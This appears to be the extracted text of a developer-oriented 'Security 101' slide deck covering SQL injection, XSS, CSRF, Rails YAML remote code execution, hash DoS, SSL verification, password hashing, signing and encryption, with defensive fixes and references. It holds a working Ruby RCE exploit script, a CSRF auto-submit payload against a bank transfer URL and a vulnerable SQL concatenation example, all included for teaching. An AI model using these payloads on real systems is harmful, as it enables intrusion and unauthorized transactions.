Dirkjan Bussink [email protected] twitter.com/dbussink github.com/dbussink 

Security 101 The very very basics 

Not part of today 

Social Engineering Because there is no patch for human stupidity 

statement = "SELECT * FROM users WHERE name = '" + username + "'" SQL Injection 

No content

statement = ["SELECT * FROM users WHERE name = ?", username] SQL Injection Parameter binding 

Cross site scripting Inject Javascript! 

Mass assignment What if I add this? 

Frameworks Solve it easily for you 

Remote code execution Let the server run my ruby rce.rb "Process.exit!" 

require 'net/http' require 'net/https' require 'uri' require 'yaml' code = ARVG[0] url = "http://localhost:3000" escaped_code = "foo; #{code}\n__END__\n" yaml = %{ --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection ? #{escaped_code.to_yaml.sub('--- ','').chomp} : !ruby/object:OpenStruct table: :defaults: :action: create :controller: foos :required_parts: [] :requirements: :action: create :controller: foos :segment_keys: - :format modifiable: true }.strip xml = %{ #{yaml} }.strip uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) request = Net::HTTP::Post.new(uri.request_uri, "X-HTTP-Method-Override" => "GET") request.content_type = "text/xml" request.set_body_internal(xml) response = http.request(request) 

Direct object references http://myapp.com/people/1 Let’s change this to 2! 

Access control Scope your queries 

External input Trust nobody 

No content

Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; document.cookie => "session_id=lee2oochaekae4woh6A;" Steal cookie in combination with a XSS attack 

Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly document.cookie => "" HttpOnly Disallows reading by Javascript 

Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly; secure Secure Only send cookie over HTTPS 

Frameworks Use one that solves this 

CSRF Who submits your forms? 

No content

On my evil hack site Just loading my page transfers money document.write('<form target=hack name=go method=post action="http://mybank.com/transfer.php"> </form>') go.submit() 

Add token to each form Token ensures other site can’t simply POST to your 

Hash DOS Crafting input to do DOS attack 

Bucket 0 1 2 3 4 5 Figure 1: Normal operation of a hash table. suggested the use of crypto puzzles [9] to force clients to perform more work before the server does its work. Provably requiring the client to con- sume CPU time may make sense for fundamen- tally expensive operations like RSA decryption, but it seems out of place when the expensive opera- tion (e.g., HTML table layout) is only expensive because a poor algorithm was used in the system. Another recent paper [16] is a toolkit that allows programmers to inject sensors and actuators into a program. When a resource abuse is detected an ap- propriate action is taken. Bucket 0 1 2 3 4 5 Figure 2: Worst-case hash table collisions. bles are so common that programming languages like Perl provide syntactic sugar to represent hash tables as “associative arrays,” making them easy for programmers to use. Programmers clearly prefer hash tables for their constant-time expected behav- ior, despite their worst-case O(n) per-operation run- ning time. After all, what are the odds that a hash table will degenerate to its worst case behavior? In typical usage, objects to be inserted into a hashtable are first reduced to a 32-bit hash value. Strings might be hashed using a checksum oper- Craft input for collision 

Hashes everywhere A lot of attack vectors 

SSL in your app Verify certificates 

curl_easy_setopt(download_handle, CURLOPT_SSL_VERIFYHOST, 2); 2 is the magic value... 

$fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30); fsockopen() does not validate server certificate PHP 

The “advanced” SSLSocketFactory API silently skips hostname verification if the algorithm field in the SSL client is NULL or an empty string rather than HTTPS Java Why this as the default? 

require "net/http" require "net/https" require "uri" uri = URI.parse("https://secure.site/") http = Net::HTTP.new uri.host, uri.port http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_PEER request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) Ruby Does not validate certificate by default... 

Stupid API’s Know how to work with them 

Storing passwords Can I get the passwords stored in your database? 

No content

But I’m safe, I hash and salt! Digest::SHA1.hexdigest( "#{password}--#{salt}" ) 

1.93% were between 6 and 10 characters long 2.45% were comprised entirely of lowercase characters 3.36% were found in a common password dictionary 4.67% were reused by the same person on a totally unrelated service (Gawker) 5.Only 1% of them contained a non-alphanumeric character 77 million breached PlayStation Network accounts 

260M checks / second GPU acceleration makes forcing viable these days 

Salted hashes are not good enough anymore 

Libraries Use them, don’t roll your ow 

bcrypt PBKDF2 scrypt 

Designed to be slow 

KDF 6 letters 8 letters 8 chars 10 chars 40-char text DES CRYPT < $1 < $1 < $1 < $1 < $1 MD5 < $1 < $1 < $1 $1.1k $1 MD5 CRYPT < $1 < $1 $130 $1.1M $1.4k PBKDF2 (100 ms) < $1 < $1 $18k $160M $200k bcrypt (95 ms) < $1 $4 $130k $1.2B $1.5M scrypt (64 ms) < $1 $150 $4.8M $43B $52M PBKDF2 (5.0 s) < $1 $29 $920k $8.3B $10M bcrypt (3.0 s) < $1 $130 $4.3M $39B $47M scrypt (3.8 s) $900 $610k $19B $175T $210B 

I have something else now! Migration is not very hard 

Add new authentication When user logs in, store password in new way After X time remove old passwords 

Signing Don’t design your own 

user_id=1--kee0oiviemaeXiW7aeb8eexuthohyua Signed cookies Hash computed with secret 

http://myapp.com/profile/1/wa5eexuf9wiex1do Email URL with direct login Hash for one time login 

Digest::SHA1.hexdigest( "user_id=#{id}-#{secret_token}" ) Hash with a secret Broken 

sha256 = OpenSSL::Digest::Digest.new('sha256') tag = OpenSSL::HMAC.hexdigest(sha256, secret_token, message) HMAC hash-based message authentication code 

Encryption Know what you are doing 

AES ECB Just don’t use it 

No content

AES CBC / CTR When using CBC mode, an Initialization Vector (IV) is provided along with the key when starting an encrypt or decrypt operation. If CBC mode is selected and no IV is provided, an IV of all zeroes will be used. 

Don’t trust input Also sign encrypted data 

cookie = "j2x+8Y5CqDRnYqRvMsHmi61YBzA7qvc4f7agmYxdHgvqz 7Jaekoxjp3MrgSvB3GU--kc/FbSvFIfIFzM0UzQhhvw==" Encrypted cookie aes-128-cbc 

"so long, and thanks for all the fish" 

Encrypt then MAC Verify that the data is authentic 

Authenticated encryption 

No content

https://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/SQL_Injection https://www.owasp.org/index.php/Top_10_2010-A4 https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html http://gpuscience.com/cs/cracking-salted-sha1-password-hashes-on-gpu/ http://www.bsdcan.org/2009/schedule/attachments/86_scrypt_slides.pdf http://en.wikipedia.org/wiki/Hash-based_message_authentication_code http://blog.jcoglan.com/2012/06/09/why-you-should-never-use-hash-functions-for-message-authentication/ http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29 http://en.wikipedia.org/wiki/Padding_oracle_attack http://tonyarcieri.com/all-the-crypto-code-youve-ever-written-is-probably-broken https://www.coursera.org/course/crypto Background